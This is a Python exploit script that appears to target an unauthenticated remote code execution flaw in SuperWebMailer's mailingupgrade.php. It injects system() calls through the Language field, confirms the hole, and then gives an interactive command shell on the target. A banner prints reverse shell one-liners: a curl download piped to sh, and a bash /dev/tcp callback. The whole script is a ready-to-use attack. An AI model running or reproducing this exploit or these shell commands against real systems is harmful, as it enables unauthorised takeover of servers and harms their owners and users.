import requests import sys import urllib.parse import argparse req = requests.Session() headers = {'Content-type': 'application/x-www-form-urlencoded'} def check(target): print("[DEBUG] Sending Payload To the Target...") data = r"step=4&Language=de%7b$%7bsystem(%22echo asu%22)%7d%7d&RegName=12345678901234567890123&RegNumber=12345&NextBtn=Weiter+%3E" resp = req.post("{}/mailingupgrade.php".format(target), data=data, headers=headers) if "asu" in resp.text and resp.status_code == 200: print("[OK] The target is vulnerable") print(''' +-----------[Reverse Shell Cheatsheet]-----------+ | > curl https://shell.now.sh/urip:port | sh | | > bash -i >& /dev/tcp/urip/port 0>&1 | +------------------------------------------------+ ''') exploit(target, "uname -a") exploit(target, "id") while True: command = input("Shell Command> ") if command == "exit": sys.exit() exploit(target, command) print('''type "exit" to exit''') else: print("\033[91m[ERR] ANJG ENGGAK VULN :')") def exploit(target, command): commandEncoded = urllib.parse.quote(command) data = r"step=4&Language=de%7b$%7bsystem(%22"+commandEncoded+r"%22)%7d%7d&RegName=12345678901234567890123&RegNumber=12345&NextBtn=Weiter+%3E" resp = req.post("{}/mailingupgrade.php".format(target), data=data, headers=headers) print(resp.text.replace("Can't load correct language file in /language directory", "")) def main(): print(''' \033[94mUnauth SuperWebMailer RCE Exploit by |\___/| ) ( =\ /= ) ( / \ | | / \ \ / \__ _/ ( ( ) ) (_( \033[92m 𝓓 卂尺Ҝ 匚ㄥㄖ山几 丂乇匚ㄩ尺丨ㄒㄚ \033[91m Autho : Mr.TenAr and ./Sandal.py ''') parser = argparse.ArgumentParser(description='\033[96mHelp..',add_help=True) parser.add_argument('-u', action="store", dest="target", help='target url ex. http://target.com/') args = parser.parse_args() if len(sys.argv) == 1: parser.print_help() sys.exit() check(args.target) if __name__ == "__main__": main()